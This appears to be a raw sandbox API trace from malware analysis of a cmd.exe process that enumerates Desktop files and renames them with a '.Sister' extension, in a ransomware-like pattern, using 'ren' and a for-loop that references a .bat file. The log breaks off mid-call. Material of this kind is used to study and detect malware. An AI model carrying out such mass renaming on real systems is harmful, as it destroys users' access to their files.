GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0144.512] GetLastError () returned 0x2 [0144.512] ??_V@YAXPEAX@Z () returned 0x1 [0144.512] malloc (_Size=0xffce) returned 0x21ed913ff00 [0144.512] ??_V@YAXPEAX@Z () returned 0x21ed913ff00 [0144.512] malloc (_Size=0xffce) returned 0x21ed914fee0 [0144.512] ??_V@YAXPEAX@Z () returned 0x21ed914fee0 [0144.512] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0144.512] GetLastError () returned 0x2 [0144.512] _get_osfhandle (_FileHandle=2) returned 0x54 [0144.512] GetFileType (hFile=0x54) returned 0x2 [0144.513] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0144.513] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0144.516] _get_osfhandle (_FileHandle=2) returned 0x54 [0144.516] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0144.527] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0144.527] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0144.527] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0144.538] longjmp () [0144.538] ??_V@YAXPEAX@Z () returned 0x1 [0144.538] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4497c0, ftCreationTime.dwHighDateTime=0x1d5ed5b, ftLastAccessTime.dwLowDateTime=0x7a16bb0, ftLastAccessTime.dwHighDateTime=0x1d5ecdb, ftLastWriteTime.dwLowDateTime=0x7a16bb0, ftLastWriteTime.dwHighDateTime=0x1d5ecdb, nFileSizeHigh=0x0, nFileSizeLow=0x18833, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="gwc793WO9abijU0o.flv", cAlternateFileName="")) returned 1 [0144.538] GetProcessHeap () returned 0x21ed8c70000 [0144.538] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d458d0, Size=0x22e) returned 0x21ed8d46410 [0144.538] GetProcessHeap () returned 0x21ed8c70000 [0144.538] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d46410) returned 0x22e [0144.538] GetProcessHeap () returned 0x21ed8c70000 [0144.538] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d61290 [0144.538] GetProcessHeap () returned 0x21ed8c70000 [0144.538] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61290, Size=0x30) returned 0x21ed8d61290 [0144.539] GetProcessHeap () returned 0x21ed8c70000 [0144.539] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61290) returned 0x30 [0144.539] GetProcessHeap () returned 0x21ed8c70000 [0144.539] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d612d0 [0144.539] malloc (_Size=0x1ff9c) returned 0x21ed915fec0 [0144.542] GetProcessHeap () returned 0x21ed8c70000 [0144.542] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bb70 [0144.542] ??_V@YAXPEAX@Z () returned 0x1 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d612d0, Size=0x1c0) returned 0x21ed8d612d0 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d612d0) returned 0x1c0 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d614a0 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d614a0, Size=0x290) returned 0x21ed8d614a0 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d614a0) returned 0x290 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d61740 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61740, Size=0x30) returned 0x21ed8d61740 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61740) returned 0x30 [0144.544] GetProcessHeap () returned 0x21ed8c70000 [0144.544] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d61780 [0144.544] malloc (_Size=0x1ff9c) returned 0x21ed915fec0 [0144.547] GetProcessHeap () returned 0x21ed8c70000 [0144.547] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bf80 [0144.547] ??_V@YAXPEAX@Z () returned 0x1 [0144.548] malloc (_Size=0x1ff9c) returned 0x21ed915fec0 [0144.551] GetFullPathNameW (in: lpFileName="gwc793WO9abijU0o.flv", nBufferLength=0xffce, lpBuffer=0x21ed915fec0, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv", lpFilePart=0xa6cf4fe1c8*="gwc793WO9abijU0o.flv") returned 0x2c [0144.551] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43330 [0144.551] FindClose (in: hFindFile=0x21ed8d43330 | out: hFindFile=0x21ed8d43330) returned 1 [0144.552] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d435d0 [0144.552] FindClose (in: hFindFile=0x21ed8d435d0 | out: hFindFile=0x21ed8d435d0) returned 1 [0144.552] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x80aea0ab, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x80aea0ab, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d42f10 [0144.552] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0144.552] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4497c0, ftCreationTime.dwHighDateTime=0x1d5ed5b, ftLastAccessTime.dwLowDateTime=0x7a16bb0, ftLastAccessTime.dwHighDateTime=0x1d5ecdb, ftLastWriteTime.dwLowDateTime=0x7a16bb0, ftLastWriteTime.dwHighDateTime=0x1d5ecdb, nFileSizeHigh=0x0, nFileSizeLow=0x18833, dwReserved0=0x4, dwReserved1=0x80, cFileName="gwc793WO9abijU0o.flv", cAlternateFileName="GWC793~1.FLV")) returned 0x21ed8d433f0 [0144.552] FindClose (in: hFindFile=0x21ed8d433f0 | out: hFindFile=0x21ed8d433f0) returned 1 [0144.552] _wcsnicmp (_String1="GWC793~1.FLV", _String2="gwc793WO9abijU0o.flv", _MaxCount=0x14) returned 7 [0144.552] malloc (_Size=0x1ff9c) returned 0x21ed917fe70 [0144.553] ??_V@YAXPEAX@Z () returned 0x21ed917fe70 [0144.554] GetProcessHeap () returned 0x21ed8c70000 [0144.554] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8a50 [0144.554] ??_V@YAXPEAX@Z () returned 0x1 [0144.554] ??_V@YAXPEAX@Z () returned 0x1 [0144.555] GetProcessHeap () returned 0x21ed8c70000 [0144.555] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61780, Size=0x1c0) returned 0x21ed8d61780 [0144.555] GetProcessHeap () returned 0x21ed8c70000 [0144.555] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61780) returned 0x1c0 [0144.555] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0144.556] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.556] GetFileType (hFile=0x50) returned 0x2 [0144.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.556] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0144.559] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.559] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0144.566] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.566] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0144.566] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0144.566] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.566] GetFileType (hFile=0x50) returned 0x2 [0144.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.566] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0144.568] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.568] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0144.569] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.569] GetFileType (hFile=0x50) returned 0x2 [0144.569] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.569] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0144.572] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.572] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d612a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d612a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0144.574] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"gwc793WO9abijU0o.flv\" \"gwc793WO9abijU0o.flv.Sister\" ") returned 54 [0144.574] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.574] GetFileType (hFile=0x50) returned 0x2 [0144.574] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.574] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.575] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.575] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0144.576] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0144.576] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.576] GetFileType (hFile=0x50) returned 0x2 [0144.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.576] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0144.578] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.578] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0144.606] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0144.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.607] GetFileType (hFile=0x50) returned 0x2 [0144.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.607] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.609] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0144.617] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0144.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.617] GetFileType (hFile=0x50) returned 0x2 [0144.617] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.617] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.619] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0144.620] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0144.620] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.620] GetFileType (hFile=0x50) returned 0x2 [0144.620] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.620] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.621] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.621] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0144.629] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.629] GetFileType (hFile=0x50) returned 0x2 [0144.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.629] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0144.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.651] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d61750*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d61750*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0144.656] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"gwc793WO9abijU0o.flv.Sister\" \"gwc793WO9abijU0o.bat\" ") returned 54 [0144.656] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.656] GetFileType (hFile=0x50) returned 0x2 [0144.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.656] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0144.660] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.660] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0144.662] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0144.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.662] GetFileType (hFile=0x50) returned 0x2 [0144.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0144.662] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0144.677] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.677] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0144.685] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0144.689] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0144.689] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0144.689] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.691] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.691] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0144.691] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0144.691] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0144.691] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0144.691] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0144.691] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0144.691] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0144.691] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0144.691] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0144.692] ??_V@YAXPEAX@Z () returned 0x1 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d458d0 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d458d0, Size=0x7c) returned 0x21ed8d458d0 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d458d0) returned 0x7c [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed8d45960 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d459f0 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d459f0, Size=0x7c) returned 0x21ed8d459f0 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d459f0) returned 0x7c [0144.692] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.692] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43330 [0144.692] GetProcessHeap () returned 0x21ed8c70000 [0144.692] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d4d0 [0144.692] _wcsicmp (_String1="gwc793WO9abijU0o.flv", _String2=".") returned 57 [0144.692] _wcsicmp (_String1="gwc793WO9abijU0o.flv", _String2="..") returned 57 [0144.692] GetFileAttributesW (lpFileName="gwc793WO9abijU0o.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\gwc793wo9abiju0o.flv")) returned 0x20 [0144.693] GetProcessHeap () returned 0x21ed8c70000 [0144.693] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9361860 [0144.694] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9361870 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0144.694] SetErrorMode (uMode=0x0) returned 0x0 [0144.694] SetErrorMode (uMode=0x1) returned 0x0 [0144.694] GetFullPathNameW (in: lpFileName="gwc793WO9abijU0o.flv", nBufferLength=0x7fe7, lpBuffer=0x21ed915fec0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv", lpFilePart=0xa6cf4fd660*="gwc793WO9abijU0o.flv") returned 0x2c [0144.694] SetErrorMode (uMode=0x0) returned 0x1 [0144.694] GetProcessHeap () returned 0x21ed8c70000 [0144.694] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d740 [0144.695] _wcsicmp (_String1="gwc793WO9abijU0o.flv", _String2=".") returned 57 [0144.695] _wcsicmp (_String1="gwc793WO9abijU0o.flv", _String2="..") returned 57 [0144.695] GetFileAttributesW (lpFileName="gwc793WO9abijU0o.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\gwc793wo9abiju0o.flv")) returned 0x20 [0144.695] ??_V@YAXPEAX@Z () returned 0x1 [0144.695] malloc (_Size=0xffce) returned 0x21ed915fec0 [0144.695] ??_V@YAXPEAX@Z () returned 0x21ed915fec0 [0144.695] malloc (_Size=0xffce) returned 0x21ed916fea0 [0144.695] ??_V@YAXPEAX@Z () returned 0x21ed916fea0 [0144.695] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\gwc793wo9abiju0o.flv")) returned 0x20 [0144.695] malloc (_Size=0xffce) returned 0x21ed917fe80 [0144.696] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0144.696] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5d4e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5d4e0) returned 0x21ed8d433f0 [0144.696] malloc (_Size=0xffce) returned 0x21ed918fe60 [0144.696] ??_V@YAXPEAX@Z () returned 0x21ed918fe60 [0144.697] ??_V@YAXPEAX@Z () returned 0x1 [0144.697] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\gwc793wo9abiju0o.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\gwc793WO9abijU0o.flv.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\gwc793wo9abiju0o.flv.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0144.697] FindNextFileW (in: hFindFile=0x21ed8d433f0, lpFindFileData=0x21ed8d5d4e0 | out: lpFindFileData=0x21ed8d5d4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4497c0, ftCreationTime.dwHighDateTime=0x1d5ed5b, ftLastAccessTime.dwLowDateTime=0x7a16bb0, ftLastAccessTime.dwHighDateTime=0x1d5ecdb, ftLastWriteTime.dwLowDateTime=0x7a16bb0, ftLastWriteTime.dwHighDateTime=0x1d5ecdb, nFileSizeHigh=0x0, nFileSizeLow=0x18833, dwReserved0=0x0, dwReserved1=0x0, cFileName="gwc793WO9abijU0o.flv", cAlternateFileName="")) returned 0 [0144.699] GetLastError () returned 0x12 [0144.699] FindClose (in: hFindFile=0x21ed8d433f0 | out: hFindFile=0x21ed8d433f0) returned 1 [0144.699] ??_V@YAXPEAX@Z () returned 0x1 [0144.699] ??_V@YAXPEAX@Z () returned 0x1 [0144.700] ??_V@YAXPEAX@Z () returned 0x1 [0144.700] ??_V@YAXPEAX@Z () returned 0x1 [0144.705] GetProcessHeap () returned 0x21ed8c70000 [0144.705] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42bb0 [0144.705] GetProcessHeap () returned 0x21ed8c70000 [0144.705] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95a00, Size=0x16) returned 0x21ed8c95980 [0144.705] GetProcessHeap () returned 0x21ed8c70000 [0144.705] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95980) returned 0x16 [0144.705] GetProcessHeap () returned 0x21ed8c70000 [0144.705] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, 